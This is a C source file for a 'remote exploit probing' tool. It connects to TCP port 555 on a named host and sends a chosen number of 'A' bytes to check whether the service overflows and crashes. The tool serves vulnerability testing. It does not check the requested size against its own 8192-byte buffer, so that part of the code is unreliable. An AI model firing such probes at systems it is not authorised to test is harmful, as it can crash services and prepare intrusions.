/*
 * exploit_probe test tool
 * 
 * *** PRIVATE -- DO NOT DISTRIBUTE ***
 *
 * compile with gcc -ggdb -o exploit_probe exploit_probe.c
 *
 */

/* includes */
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
//#include <signal.h>
#include <ctype.h>
#include <netdb.h>
#if defined (__OpenBSD__) || defined (__NetBSD__)
#include <limits.h>
#endif

/* defines*/ 
#define VERSION "1.0"
#define MAXBUF 8192

void usage(char *prog)
{
  fprintf(stderr,"USAGE: ");
  fprintf(stderr,"%s <size> <target>\n\n",prog);
}


/* main */
int main(int argc, char **argv)
{
  int i=0;
  struct sockaddr_in address;
  struct hostent *hp;                                                   
  int result = 1;
  char ch;
  int sockfd;
  int size;
  char *prog;
  char buffer[MAXBUF];

  prog = argv[0];

  printf("Remote Exploit Probing Test Tool, v%s\n",VERSION);
  printf("Simple Nomad <thegnome@nmrc.org>\n\n");

  if(argc <= 2)
  {
    usage(prog);
    exit(-1);
  }

  size = (int)strtol(argv[1],NULL,10);

  hp = gethostbyname(argv[2]);
  if (hp == NULL)
  {
    printf("Unable to resolve %s, unknown host\n", argv[2]);
    exit(-1);
  }

  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  address.sin_family = AF_INET;
  address.sin_addr = *(struct in_addr *)*hp->h_addr_list;
  address.sin_port = htons(555); // tcp port

  printf("[+] Connecting to host\n");

  result = connect(sockfd, (struct sockaddr *)&address, sizeof(address));
  if (result == -1)
  {
    printf("[!] Unable to connect to server %s\n",argv[2]);
    exit(1);
  }

  printf("[+] Connected\n");
  printf("[+] Building payload of %d \"A\"s\n",size);

  // fill buffer with A's
  for(i=0; i < size; i++)
  { buffer[i] = '\x41'; }

  buffer[size-1] = 0;

  printf("[+] Sending probe\n");
  write(sockfd, &buffer,size);
  sleep(1);
  printf("[+] Probe sent, closing socket\n");
  close(sockfd);

  exit(0);
}